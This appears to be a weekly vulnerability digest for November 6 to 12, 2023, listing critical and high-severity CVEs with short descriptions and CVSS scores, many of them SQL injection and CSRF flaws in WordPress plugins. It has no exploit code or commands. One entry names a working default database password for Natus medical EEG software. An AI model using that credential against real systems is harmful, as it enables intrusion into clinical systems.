Weekly Vulnerabilities Reports > November 6 to 12, 2023

Overview

559 new vulnerabilities were reported during this period, including 86 critical vulnerabilities and 226 high severity vulnerabilities. This weekly summary reports vulnerabilities in 1277 products from 313 vendors including Samsung, Lenovo, Qualcomm, Huawei, and Fedoraproject. Vulnerabilities are notably categorized as "Cross-Site Request Forgery (CSRF)", "Cross-site Scripting", "Out-of-bounds Write", "SQL Injection", and "Improper Neutralization of Formula Elements in a CSV File".

  • 445 reported vulnerabilities are remotely exploitable.
  • 168 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 333 reported vulnerabilities are exploitable by an anonymous user.
  • Samsung has the most reported vulnerabilities, with 33 reported vulnerabilities.
  • Zavio has the most reported critical vulnerabilities, with 5 reported vulnerabilities.

Summary counters (values not recoverable from this page): total vulnerabilities; critical, high, medium and low risk vulnerabilities; remotely exploitable; locally exploitable; exploit available; exploitable anonymously; affecting web application.

Vulnerability Details

The following table lists reported vulnerabilities for the period covered by this report:


86 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-12 CVE-2023-6084 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere 2017

A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical.

9.8
2023-11-11 CVE-2023-46850 Openvpn
Debian
Fedoraproject
Use After Free vulnerability in multiple products

Use after free in OpenVPN version 2.6.0 to 2.6.6 may lead to undefined behaviour, leaking memory buffers or remote execution when sending network buffers to a remote peer.

9.8
2023-11-10 CVE-2023-4804 Johnsoncontrols Unspecified vulnerability in Johnsoncontrols products

An unauthorized user could access debug features in Quantum HD Unity products that were accidentally exposed.

9.8
2023-11-10 CVE-2023-47129 Statamic Unrestricted Upload of File with Dangerous Type vulnerability in Statamic

Statamic is a core Laravel content management system Composer package.

9.8
2023-11-10 CVE-2023-47121 Discourse Server-Side Request Forgery (SSRF) vulnerability in Discourse

Discourse is an open source platform for community discussion.

9.8
2023-11-10 CVE-2023-6074 Phpgurukul SQL Injection vulnerability in PHPgurukul Restaurant Table Booking System 1.0

A vulnerability was found in PHPGurukul Restaurant Table Booking System 1.0.

9.8
2023-11-10 CVE-2023-47800 Natus Use of Hard-coded Credentials vulnerability in Natus Neuroworks EEG and Sleepworks

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

9.8
2023-11-10 CVE-2023-39796 Wbce SQL Injection vulnerability in Wbce CMS 1.6.0

SQL injection vulnerability in the miniform module in WBCE CMS v.1.6.0 allows a remote unauthenticated attacker to execute arbitrary code via the DB_RECORD_TABLE parameter.

9.8
2023-11-10 CVE-2023-47246 Sysaid Path Traversal vulnerability in Sysaid On-Premises

In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

9.8
2023-11-09 CVE-2023-5550 Moodle
Fedoraproject

In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user who also has direct access to the web server outside of the Moodle webroot could utilise a local file include to achieve remote code execution.

9.8
2023-11-09 CVE-2023-6053 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere

A vulnerability, which was classified as critical, has been found in Tongda OA 2017 up to 11.9.

9.8
2023-11-09 CVE-2023-6054 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere

A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9.

9.8
2023-11-09 CVE-2023-47610 Telit Classic Buffer Overflow vulnerability in Telit products

A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a remote unauthenticated attacker to execute arbitrary code on the targeted system by sending a specially crafted SMS message.

9.8
2023-11-09 CVE-2023-41137 Appsanywhere Use of Hard-coded Credentials vulnerability in Appsanywhere Client

Symmetric encryption used to protect messages between the AppsAnywhere server and client can be broken by reverse engineering the client and used to impersonate the AppsAnywhere server.

9.8
2023-11-09 CVE-2023-4612 Apereo Improper Authentication vulnerability in Apereo Central Authentication Service

Improper Authentication vulnerability in Apereo CAS in jakarta.servlet.http.HttpServletRequest.getRemoteAddr method allows Multi-Factor Authentication bypass. This issue affects CAS: through 7.0.0-RC7.

9.8
2023-11-09 CVE-2023-6052 Tongda2000 SQL Injection vulnerability in Tongda2000 Tongda Office Anywhere

A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.9.

9.8
2023-11-09 CVE-2023-47248 Apache Deserialization of Untrusted Data vulnerability in Apache Pyarrow

Deserialization of untrusted data in IPC and Parquet readers in PyArrow versions 0.14.0 to 14.0.0 allows arbitrary code execution.

9.8
2023-11-08 CVE-2023-39435 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to stack-based overflows.

9.8
2023-11-08 CVE-2023-3959 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows.

9.8
2023-11-08 CVE-2023-43755 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows.

9.8
2023-11-08 CVE-2023-45225 Zavio Out-of-bounds Write vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows.

9.8
2023-11-08 CVE-2023-4249 Zavio OS Command Injection vulnerability in Zavio products

Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 have a command injection vulnerability in the implementation of their binaries and handling of network requests.

9.8
2023-11-08 CVE-2023-29974 Pfsense Weak Password Requirements vulnerability in Pfsense 2.6.0

An issue discovered in Pfsense CE version 2.6.0 allows attackers to compromise user accounts via weak password requirements.

9.8
2023-11-08 CVE-2023-5913 Microfocus Unspecified vulnerability in Microfocus Fortify Scancentral Dast

Incorrect Privilege Assignment vulnerability in opentext Fortify ScanCentral DAST.

9.8
2023-11-08 CVE-2023-45849 Perforce Code Injection vulnerability in Perforce Helix Core

An arbitrary code execution which results in privilege escalation was discovered in Helix Core versions prior to 2023.2.

9.8
2023-11-08 CVE-2023-47397 Webidsupport Code Injection vulnerability in Webidsupport Webid

WeBid <=1.2.2 is vulnerable to code injection via admin/categoriestrans.php.

9.8
2023-11-08 CVE-2023-6012 Lanaccess Unspecified vulnerability in Lanaccess Onsafe Monitorhm 3.7.0

An improper input validation vulnerability has been found in Lanaccess ONSAFE MonitorHM affecting version 3.7.0.

9.8
2023-11-08 CVE-2023-5941 Freebsd Incorrect Calculation of Buffer Size vulnerability in Freebsd

In versions of FreeBSD 12.4-RELEASE prior to 12.4-RELEASE-p7 and FreeBSD 13.2-RELEASE prior to 13.2-RELEASE-p5 the __sflush() stdio function in libc does not correctly update FILE objects' write space members for write-buffered streams when the write(2) system call returns an error.

9.8
2023-11-07 CVE-2023-46785 Projectworlds Unspecified vulnerability in Projectworlds Online Matrimonial Project 1.0

Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities.

9.8
2023-11-07 CVE-2023-5309 Puppet Session Fixation vulnerability in Puppet Enterprise

Versions of Puppet Enterprise prior to 2021.7.6 and 2023.5 contain a flaw which results in broken session management for SAML implementations.

9.8
2023-11-07 CVE-2022-45360 Coffee2Code Improper Neutralization of Formula Elements in a CSV File vulnerability in Coffee2Code Commenter Emails

Improper Neutralization of Formula Elements in a CSV File vulnerability in Scott Reilly Commenter Emails. This issue affects Commenter Emails: from n/a through 2.6.1.

9.8
2023-11-07 CVE-2022-45370 Webtoffee Improper Neutralization of Formula Elements in a CSV File vulnerability in Webtoffee Wordpress Comments Import and Export

Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee WordPress Comments Import & Export. This issue affects WordPress Comments Import & Export: from n/a through 2.3.1.

9.8
2023-11-07 CVE-2022-45810 Icegram Improper Neutralization of Formula Elements in a CSV File vulnerability in Icegram Express

Improper Neutralization of Formula Elements in a CSV File vulnerability in Icegram Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce. This issue affects Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce: from n/a through 5.5.2.

9.8
2023-11-07 CVE-2022-46801 Geminilabs Improper Neutralization of Formula Elements in a CSV File vulnerability in Geminilabs Site Reviews

Improper Neutralization of Formula Elements in a CSV File vulnerability in Paul Ryley Site Reviews. This issue affects Site Reviews: from n/a through 6.2.0.

9.8
2023-11-07 CVE-2022-46803 Noptin Improper Neutralization of Formula Elements in a CSV File vulnerability in Noptin

Improper Neutralization of Formula Elements in a CSV File vulnerability in Noptin Newsletter Simple Newsletter Plugin – Noptin. This issue affects Simple Newsletter Plugin – Noptin: from n/a through 1.9.5.

9.8
2023-11-07 CVE-2022-46809 Wpdeveloper Improper Neutralization of Formula Elements in a CSV File vulnerability in Wpdeveloper Reviewx

Improper Neutralization of Formula Elements in a CSV File vulnerability in WPDeveloper ReviewX – Multi-criteria Rating & Reviews for WooCommerce. This issue affects ReviewX – Multi-criteria Rating & Reviews for WooCommerce: from n/a through 1.6.7.

9.8
2023-11-07 CVE-2022-45357 Lenderd Unspecified vulnerability in Lenderd 1003 Mortgage Application

Improper Neutralization of Formula Elements in a CSV File vulnerability in Lenderd 1003 Mortgage Application. This issue affects 1003 Mortgage Application: from n/a through 1.75.

9.8
2023-11-07 CVE-2022-46802 Webtoffee Unspecified vulnerability in Webtoffee Product Reviews Import Export for Woocommerce

Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee Product Reviews Import Export for WooCommerce. This issue affects Product Reviews Import Export for WooCommerce: from n/a through 1.4.8.

9.8
2023-11-07 CVE-2023-22719 Givewp Improper Neutralization of Formula Elements in a CSV File vulnerability in Givewp

Improper Neutralization of Formula Elements in a CSV File vulnerability in GiveWP. This issue affects GiveWP: from n/a through 2.25.1.

9.8
2023-11-07 CVE-2023-23796 WEB Settler Improper Neutralization of Formula Elements in a CSV File vulnerability in Web-Settler Form Builder

Improper Neutralization of Formula Elements in a CSV File vulnerability in Muneeb Form Builder | Create Responsive Contact Forms. This issue affects Form Builder | Create Responsive Contact Forms: from n/a through 1.9.9.0.

9.8
2023-11-07 CVE-2023-47359 Videolan Out-of-bounds Write vulnerability in Videolan VLC Media Player

Videolan VLC prior to version 3.0.20 contains an incorrect offset read that leads to a Heap-Based Buffer Overflow in function GetPacket() and results in memory corruption.

9.8
2023-11-07 CVE-2023-33478 Remoteclinic SQL Injection vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic 2.0 has a SQL injection vulnerability in the ID parameter of /medicines/stocks.php.

9.8
2023-11-07 CVE-2023-33479 Remoteclinic SQL Injection vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic version 2.0 contains a SQL injection vulnerability in the /staff/edit.php file.

9.8
2023-11-07 CVE-2023-33481 Remoteclinic SQL Injection vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic 2.0 is vulnerable to a time-based blind SQL injection attack in the 'start' GET parameter of patients/index.php.

9.8
2023-11-07 CVE-2023-42283 TYK SQL Injection vulnerability in TYK 5.0.3

Blind SQL injection in the api_id parameter in Tyk Gateway version 5.0.3 allows an attacker to access and dump the database via a crafted SQL query.

9.8
2023-11-07 CVE-2023-42284 TYK SQL Injection vulnerability in TYK 5.0.3

Blind SQL injection in the api_version parameter in Tyk Gateway version 5.0.3 allows an attacker to access and dump the database via a crafted SQL query.

9.8
2023-11-07 CVE-2023-38547 Veeam Unspecified vulnerability in Veeam ONE

A vulnerability in Veeam ONE allows an unauthenticated user to gain information about the SQL server connection Veeam ONE uses to access its configuration database.

9.8
2023-11-07 CVE-2023-22388 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory Corruption in Multi-mode Call Processor while processing bit mask API.

9.8
2023-11-07 CVE-2023-33045 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in WLAN Firmware while parsing a NAN management frame carrying a S3 attribute.

9.8
2023-11-07 CVE-2023-2675 Linagora Unspecified vulnerability in Linagora Twake

Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 2023.Q1.1223.

9.8
2023-11-06 CVE-2023-5601 Atomicwebstrategy Unrestricted Upload of File with Dangerous Type vulnerability in Atomicwebstrategy Woocommerce Ninja Forms Product Add-Ons

The WooCommerce Ninja Forms Product Add-ons WordPress plugin before 1.7.1 does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.

9.8
2023-11-06 CVE-2023-5719 Redlion Unspecified vulnerability in Redlion Crimson

The Crimson 3.2 Windows-based configuration tool allows users with administrative access to define new passwords for users and to download the resulting security configuration to a device.

9.8
2023-11-06 CVE-2023-5777 Weintek Use of Hard-coded Credentials vulnerability in Weintek Easybuilder PRO

Weintek EasyBuilder Pro contains a vulnerability in which the private key is exposed to the public even though it is deleted immediately after the crash report transmission finishes, which could result in obtaining remote control of the crash report server.

9.8
2023-11-06 CVE-2023-46731 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

9.8
2023-11-06 CVE-2023-45827 Clickbar Unspecified vulnerability in Clickbar Dot-Diver

Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation.

9.8
2023-11-06 CVE-2023-27605 WP Reroute Email Project SQL Injection vulnerability in WP Reroute Email Project WP Reroute Email

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sajjad Hossain WP Reroute Email allows SQL Injection. This issue affects WP Reroute Email: from n/a through 1.4.6.

9.8
2023-11-06 CVE-2023-28748 Appjetty SQL Injection vulnerability in Appjetty Copy or Move Comments

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in biztechc Copy or Move Comments allows SQL Injection. This issue affects Copy or Move Comments: from n/a through 5.0.4.

9.8
2023-11-06 CVE-2023-33924 Felixwelberg SQL Injection vulnerability in Felixwelberg SIS Handball

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Felix Welberg SIS Handball allows SQL Injection. This issue affects SIS Handball: from n/a through 1.0.45.

9.8
2023-11-06 CVE-2023-35911 Creative Solutions SQL Injection vulnerability in Creative-Solutions Contact Form Generator

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Creative Solutions Contact Form Generator : Creative form builder for WordPress allows SQL Injection. This issue affects Contact Form Generator : Creative form builder for WordPress: from n/a through 2.6.0.

9.8
2023-11-06 CVE-2023-38382 Subscribe TO Category Project SQL Injection vulnerability in Subscribe to Category Project Subscribe to Category

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category allows SQL Injection. This issue affects Subscribe to Category: from n/a through 2.7.4.

9.8
2023-11-06 CVE-2023-40207 Rednao SQL Injection vulnerability in Rednao Donations Made Easy - Smart Donations

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RedNao Donations Made Easy – Smart Donations allows SQL Injection. This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12.

9.8
2023-11-06 CVE-2023-40609 Rocklobster SQL Injection vulnerability in Rocklobster Contact Form 7 Custom Validation 1.1.3

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aiyaz, maheshpatel Contact form 7 Custom validation allows SQL Injection. This issue affects Contact form 7 Custom validation: from n/a through 1.1.3.

9.8
2023-11-06 CVE-2023-41685 Ilghera SQL Injection vulnerability in Ilghera Woocommerce Support System

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ilGhera Woocommerce Support System allows SQL Injection. This issue affects Woocommerce Support System: from n/a through 1.2.1.

9.8
2023-11-06 CVE-2023-45001 Castos SQL Injection vulnerability in Castos Seriously Simple Stats 1.1/1.2.0

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Castos Seriously Simple Stats allows SQL Injection. This issue affects Seriously Simple Stats: from n/a through 1.5.0.

9.8
2023-11-06 CVE-2023-45046 Pressference SQL Injection vulnerability in Pressference Exporter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pressference Pressference Exporter allows SQL Injection. This issue affects Pressference Exporter: from n/a through 1.0.3.

9.8
2023-11-06 CVE-2023-45055 Inspireui SQL Injection vulnerability in Inspireui Mstore API

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in InspireUI MStore API allows SQL Injection. This issue affects MStore API: from n/a through 4.0.6.

9.8
2023-11-06 CVE-2023-45069 Total Soft SQL Injection vulnerability in Total-Soft Video Gallery

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Video Gallery by Total-Soft Video Gallery – Best WordPress YouTube Gallery Plugin allows SQL Injection. This issue affects Video Gallery – Best WordPress YouTube Gallery Plugin: from n/a through 2.1.3.

9.8
2023-11-06 CVE-2023-45074 Pagevisitcounter SQL Injection vulnerability in Pagevisitcounter Advanced Page Visit Counter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress allows SQL Injection. This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 7.1.1.

9.8
2023-11-06 CVE-2023-45657 Posimyth SQL Injection vulnerability in Posimyth Nexter

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSIMYTH Nexter allows SQL Injection. This issue affects Nexter: from n/a through 2.0.3.

9.8
2023-11-06 CVE-2023-45830 Adaplugin SQL Injection vulnerability in Adaplugin Accessibility Suite BY Online ADA

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Online ADA Accessibility Suite by Online ADA allows SQL Injection. This issue affects Accessibility Suite by Online ADA: from n/a through 4.11.

9.8
2023-11-06 CVE-2022-45373 WP Slimstat SQL Injection vulnerability in Wp-Slimstat Slimstat Analytics

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Jason Crouse, VeronaLabs Slimstat Analytics allows SQL Injection. This issue affects Slimstat Analytics: from n/a through 5.0.4.

9.8
2023-11-06 CVE-2022-46849 Weblizar SQL Injection vulnerability in Weblizar Responsive Coming Soon & Maintenance Mode

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar Coming Soon Page – Responsive Coming Soon & Maintenance Mode allows SQL Injection. This issue affects Coming Soon Page – Responsive Coming Soon & Maintenance Mode: from n/a through 1.5.9.

9.8
2023-11-06 CVE-2022-46860 Kaizencoders SQL Injection vulnerability in Kaizencoders Short URL

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in KaizenCoders Short URL allows SQL Injection. This issue affects Short URL: from n/a through 1.6.4.

9.8
2023-11-06 CVE-2022-47420 Adaplugin SQL Injection vulnerability in Adaplugin Accessibility Suite BY Online ADA

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Online ADA Accessibility Suite by Online ADA allows SQL Injection. This issue affects Accessibility Suite by Online ADA: from n/a through 4.11.

9.8
2023-11-06 CVE-2022-47428 Wpdevart SQL Injection vulnerability in Wpdevart Booking Calendar

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WpDevArt Booking calendar, Appointment Booking System allows SQL Injection. This issue affects Booking calendar, Appointment Booking System: from n/a through 3.2.7.

9.8
2023-11-06 CVE-2022-47430 Weblizar SQL Injection vulnerability in Weblizar School Management - Education & Learning Management

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar The School Management – Education & Learning Management allows SQL Injection. This issue affects The School Management – Education & Learning Management: from n/a through 4.1.

9.8
2023-11-06 CVE-2022-47432 Kemalyazici SQL Injection vulnerability in Kemalyazici Shortcode Imdb

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Kemal YAZICI - PluginPress Shortcode IMDB allows SQL Injection. This issue affects Shortcode IMDB: from n/a through 6.0.8.

9.8
2023-11-06 CVE-2023-38406 Frrouting Improper Handling of Exceptional Conditions vulnerability in Frrouting

bgpd/bgp_flowspec.c in FRRouting (FRR) before 8.4.3 mishandles an nlri length of zero, aka a "flowspec overflow."

9.8
2023-11-06 CVE-2023-47253 Qualitor Command Injection vulnerability in Qualitor Qualitor

Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.

9.8
2023-11-06 CVE-2018-25093 Vaerys Dawn Unspecified vulnerability in Vaerys-Dawn Discordsailv2

A vulnerability was found in Vaerys-Dawn DiscordSailv2 up to 2.10.2.

9.8
2023-11-10 CVE-2023-47128 Piccolo ORM SQL Injection vulnerability in Piccolo-Orm Piccolo 1.1.0

Piccolo is an object-relational mapping and query builder which supports asyncio.

9.1
2023-11-08 CVE-2023-5801 Huawei Authentication Bypass by Spoofing vulnerability in Huawei Emui and Harmonyos

Vulnerability of identity verification being bypassed in the face unlock module.

9.1
2023-11-07 CVE-2023-46501 Boltwire Unspecified vulnerability in Boltwire 6.03

An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function.

9.1
2023-11-07 CVE-2023-47455 Tenda Out-of-bounds Write vulnerability in Tenda Ax1806 Firmware 1.0.0.1

Tenda AX1806 V1.0.0.1 contains a heap overflow vulnerability in the setSchedWifi function, in which src and v12 are obtained directly from the HTTP request parameters schedStartTime and schedEndTime without checking their size.

9.1
2023-11-07 CVE-2023-47456 Tenda Out-of-bounds Write vulnerability in Tenda Ax1806 Firmware 1.0.0.1

Tenda AX1806 V1.0.0.1 contains a stack overflow vulnerability in function sub_455D4, called by function fromSetWirelessRepeat.

9.1
2023-11-06 CVE-2023-4699 Mitsubishielectric Insufficient Verification of Data Authenticity vulnerability in Mitsubishielectric products

Insufficient Verification of Data Authenticity vulnerability in Mitsubishi Electric Corporation MELSEC-F Series main modules and MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to reset the memory of the products to factory default state and cause a denial-of-service (DoS) condition on the products by sending specific packets.

9.1

226 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-12 CVE-2023-27417 Ifeelweb Cross-Site Request Forgery (CSRF) vulnerability in Ifeelweb Affiliate Super Assistent

Cross-Site Request Forgery (CSRF) vulnerability in Timo Reith Affiliate Super Assistent plugin <= 1.5.1 versions.

8.8
2023-11-12 CVE-2023-27418 WOW Company Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Side Menu Lite

Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Side Menu Lite – add sticky fixed buttons plugin <= 4.0 versions.

8.8
2023-11-12 CVE-2023-27431 Themehunk Cross-Site Request Forgery (CSRF) vulnerability in Themehunk BIG Store

Cross-Site Request Forgery (CSRF) vulnerability in ThemeHunk Big Store theme <= 1.9.3 versions.

8.8
2023-11-12 CVE-2023-27611 Jeanbaptisteaudras Cross-Site Request Forgery (CSRF) vulnerability in Jeanbaptisteaudras Reusable Blocks Extended

Cross-Site Request Forgery (CSRF) vulnerability in audrasjb Reusable Blocks Extended plugin <= 0.9 versions.

8.8
2023-11-12 CVE-2023-27623 Jenst Cross-Site Request Forgery (CSRF) vulnerability in Jenst WP Page Numbers

Cross-Site Request Forgery (CSRF) vulnerability in Jens Törnell WP Page Numbers plugin <= 0.5 versions.

8.8
2023-11-12 CVE-2023-27632 Daily Prayer Time Project Cross-Site Request Forgery (CSRF) vulnerability in Daily Prayer Time Project Daily Prayer Time

Cross-Site Request Forgery (CSRF) vulnerability in mmrs151 Daily Prayer Time plugin <= 2023.03.08 versions.

8.8
2023-11-12 CVE-2023-28167 Vsourz Cross-Site Request Forgery (CSRF) vulnerability in Vsourz CF7 Invisible Recaptcha

Cross-Site Request Forgery (CSRF) vulnerability in Vsourz Digital CF7 Invisible reCAPTCHA plugin <= 1.3.3 versions.

8.8
2023-11-12 CVE-2023-28172 Flippercode Cross-Site Request Forgery (CSRF) vulnerability in Flippercode WP Google MAP

Cross-Site Request Forgery (CSRF) vulnerability in flippercode WordPress Plugin for Google Maps – WP MAPS (formerly WP Google Map Plugin) plugin <= 4.4.2 versions.

8.8
2023-11-12 CVE-2023-28173 Digitalinspiration Cross-Site Request Forgery (CSRF) vulnerability in Digitalinspiration Google XML Sitemap for Images

Cross-Site Request Forgery (CSRF) vulnerability in Amit Agarwal Google XML Sitemap for Images plugin <= 2.1.3 versions.

8.8
2023-11-12 CVE-2023-28419 Strangerstudios Cross-Site Request Forgery (CSRF) vulnerability in Strangerstudios Force Display Name

Cross-Site Request Forgery (CSRF) vulnerability in Stranger Studios Force First and Last Name as Display Name plugin <= 1.2 versions.

8.8
2023-11-12 CVE-2023-28420 Leocaseiro Cross-Site Request Forgery (CSRF) vulnerability in Leocaseiro Custom Options Plus

Cross-Site Request Forgery (CSRF) vulnerability in Leo Caseiro Custom Options Plus plugin <= 1.8.1 versions.

8.8
2023-11-12 CVE-2023-28495 Mythemeshop Cross-Site Request Forgery (CSRF) vulnerability in Mythemeshop WP Shortcode

Cross-Site Request Forgery (CSRF) vulnerability in MyThemeShop WP Shortcode by MyThemeShop plugin <= 1.4.16 versions.

8.8
2023-11-12 CVE-2023-28497 Tribulant Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Slideshow Gallery

Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Slideshow Gallery LITE plugin <= 1.7.6 versions.

8.8
2023-11-12 CVE-2023-28498 Motopress Cross-Site Request Forgery (CSRF) vulnerability in Motopress Hotel Booking Lite

Cross-Site Request Forgery (CSRF) vulnerability in MotoPress Hotel Booking Lite plugin <= 4.6.0 versions.

8.8
2023-11-12 CVE-2023-28618 Infolific Cross-Site Request Forgery (CSRF) vulnerability in Infolific Enhanced Plugin Admin

Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Enhanced Plugin Admin plugin <= 1.16 versions.

8.8
2023-11-12 CVE-2023-28694 Wbcomdesigns Cross-Site Request Forgery (CSRF) vulnerability in Wbcomdesigns Buddypress Activity Social Share

Cross-Site Request Forgery (CSRF) vulnerability in Wbcom Designs Wbcom Designs – BuddyPress Activity Social Share plugin <= 3.5.0 versions.

8.8
2023-11-12 CVE-2023-28696 Themeist Cross-Site Request Forgery (CSRF) vulnerability in Themeist I Recommend This

Cross-Site Request Forgery (CSRF) vulnerability in Harish Chouhan, Themeist I Recommend This plugin <= 3.9.0 versions.

8.8
2023-11-12 CVE-2023-28930 Robinphillips Cross-Site Request Forgery (CSRF) vulnerability in Robinphillips Mobile Banner

Cross-Site Request Forgery (CSRF) vulnerability in Robin Phillips Mobile Banner plugin <= 1.5 versions.

8.8
2023-11-12 CVE-2023-28987 Wpmet Cross-Site Request Forgery (CSRF) vulnerability in Wpmet WP Ultimate Review

Cross-Site Request Forgery (CSRF) vulnerability in Wpmet Wp Ultimate Review plugin <= 2.0.3 versions.

8.8
2023-11-12 CVE-2023-29238 Whydonate Cross-Site Request Forgery (CSRF) vulnerability in Whydonate WP Whydonate

Cross-Site Request Forgery (CSRF) vulnerability in Whydonate Whydonate – FREE Donate button – Crowdfunding – Fundraising plugin <= 3.12.15 versions.

8.8
2023-11-12 CVE-2023-29425 Plainware Cross-Site Request Forgery (CSRF) vulnerability in Plainware Shiftcontroller

Cross-Site Request Forgery (CSRF) vulnerability in plainware.com ShiftController Employee Shift Scheduling plugin <= 4.9.23 versions.

8.8
2023-11-10 CVE-2023-39295 Qnap OS Command Injection vulnerability in Qnap Qumagie

An OS command injection vulnerability has been reported to affect QuMagie.

8.8
2023-11-10 CVE-2023-41284 Qnap SQL Injection vulnerability in Qnap Qumagie

A SQL injection vulnerability has been reported to affect QuMagie.

8.8
2023-11-10 CVE-2023-41285 Qnap SQL Injection vulnerability in Qnap Qumagie

A SQL injection vulnerability has been reported to affect QuMagie.

8.8
2023-11-10 CVE-2023-29426 Spreadshop Cross-Site Request Forgery (CSRF) vulnerability in Spreadshop 1.6.5

Cross-Site Request Forgery (CSRF) vulnerability in Robert Schulz (sprd.net AG) Spreadshop plugin <= 1.6.5 versions.

8.8
2023-11-10 CVE-2023-29428 Superbthemes Cross-Site Request Forgery (CSRF) vulnerability in Superbthemes Superb Social Media Share Buttons and Follow Buttons

Cross-Site Request Forgery (CSRF) vulnerability in SuPlugins Superb Social Media Share Buttons and Follow Buttons for WordPress plugin <= 1.1.3 versions.

8.8
2023-11-10 CVE-2023-29440 Presstigers Cross-Site Request Forgery (CSRF) vulnerability in Presstigers Simple JOB Board

Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Job Board plugin <= 2.10.3 versions.

8.8
2023-11-10 CVE-2023-30478 Tribulant Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Newsletters

Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Newsletters plugin <= 4.8.8 versions.

8.8
